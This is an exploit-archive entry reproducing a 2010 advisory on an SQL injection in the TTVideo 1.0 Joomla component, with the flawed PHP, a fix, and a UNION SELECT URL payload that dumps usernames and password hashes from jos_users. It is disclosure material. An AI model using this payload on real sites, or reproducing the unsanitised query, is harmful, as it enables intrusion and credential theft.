Joomla Component TTVideo 1.0 SQL Injection Vulnerability

2010-07-27T00:00:00
ID 1337DAY-ID-13486
Type zdt
Reporter Salvatore Fresta
Modified 2010-07-27T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            ========================================================
Joomla Component TTVideo 1.0 SQL Injection Vulnerability
========================================================


TTVideo 1.0 Joomla Component SQL Injection Vulnerability
 
Download link: http://www.toughtomato.com/resources/downloads/joomla-1.5/components/ttvideo/
 
 Name              TTVideo
 Vendor            http://www.toughtomato.com
 Versions Affected 1.0
 
 Author            Salvatore Fresta aka Drosophila
 Website           http://www.salvatorefresta.net
 Contact           salvatorefresta [at] gmail [dot] com
 Date              2010-07-27
 
X. INDEX
 
 I.    ABOUT THE APPLICATION
 II.   DESCRIPTION
 III.  ANALYSIS
 IV.   SAMPLE CODE
 V.    FIX
  
 
I. ABOUT THE APPLICATION
________________________
 
TTVideo  is  a  Joomla!  component that makes use of the
popular  video  sharing  site  Vimeo  to  create a video
library.
 
 
II. DESCRIPTION
_______________
 
A  parameter  in  ttvideo.php  is not properly sanitised
before being used in a SQL query.
 
 
III. ANALYSIS
_____________
 
Summary:
 
 A) SQL Injection
  
 
A) SQL Injection
________________
 
The parameter cid passed to ttvideo.php when task is set
to video  is not properly sanitised before being used in
a SQL query.  This  can  be  exploited to manipulate SQL
queries by injecting arbitrary SQL code.  The  following
is the vulnerable code:
 
ttvideoController.php (line 40):
 
function video() {
    $cid = JRequest::getVar('cid', null, 'default');
     
 
ttvideo.php (line 188):
 
function getVideo($id) {
    $db = $this->getDBO();
    $db->setQuery("SELECT * from #__ttvideo WHERE id=$id");
    $video = $db->loadObject();
    if ($video === null)
      JError::raiseError(500, 'Video with ID: '.$id.' not found.');
    return $video;
}
 
 
IV. SAMPLE CODE
_______________
 
A) SQL Injection
 
http://site/path/index.php?option=com_ttvideo&task=video&cid=-1 UNION SELECT 1,2,3,4,5,6,7,8,CONCAT(username,0x3A,password),10,11,12,13,14,15,16,17 FROM jos_users
 
 
V. FIX
______
 
Use JRequest::getInt instead of JRequest::getVar



#  0day.today [2018-04-04]  #